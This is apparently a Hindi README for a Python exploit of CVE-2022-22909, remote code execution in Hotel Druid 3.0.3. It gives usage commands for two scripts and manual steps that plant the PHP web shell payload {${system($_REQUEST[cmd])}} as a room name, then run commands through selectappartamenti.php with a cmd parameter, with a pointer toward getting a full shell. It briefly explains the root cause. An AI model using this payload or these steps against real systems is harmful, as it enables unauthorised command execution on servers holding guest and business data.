
Python-आधारित एक्सप्लॉइट जो Hotel Druid 3.0.3 रिमोट कोड एक्ज़ीक्यूशन (CVE-2022-22909) के लिए है। कमरे के नामों के माध्यम से PHP पेलोड इंजेक्ट करता है ताकि कमांड एक्ज़ीक्यूशन और कमजोर टारगेट पर शेल एक्सेस प्राप्त किया जा सके।
यह एक्सप्लॉइट हमारे PHP पेलोड को कमरे के नाम के रूप में एक नया कमरा बनाएगा।
उपयोग :
$ ./HotelDruidExploit.py -h

$ ./HotelDruidExploit.py -u http://127.0.0.1/hoteldruid

यह एक्सप्लॉइट तब काम करेगा जब आप पहले से कमरे का नाम जानते हों।
उपयोग :
$ ./HotelDruidExploitRoom.py -u "http://127.0.0.1/hoteldruid" -r "abc"

1). होटल ड्रूइड पेज पर जाएँ।
2). Tables -> Rooms पर क्लिक करें।

3). Create New Room फ़ील्ड में नीचे दिया गया php कोड डालें, और Add पर क्लिक करें।
{${system($_REQUEST[cmd])}}

4). आपको "Room" नाम फ़ील्ड में हमारे पेलोड के साथ एक नया कमरा दिखाई देगा।

5). नीचे दिए गए लिंक पर जाएँ और आपको कमांड एक्ज़ीक्यूशन मिलेगा, बाद में आप पूर्ण शेल प्राप्त कर सकते हैं।
http://127.0.0.1/hoteldruid/dati/selectappartamenti.php?cmd=whoami
नोट : अपने hoteldruid लक्ष्य IP के साथ Ip बदलें।
यह कमज़ोरी इसलिए होती है क्योंकि कमरे के नाम /var/www/html/hoteldruid/dati/selectappartamenti.php के अंदर संग्रहीत किए जा रहे हैं।

और selectappartamenti.php एक PHP फ़ाइल है, इसलिए उस फ़ाइल के अंदर कोई भी PHP कोड सर्वर द्वारा निष्पादित हो जाएगा।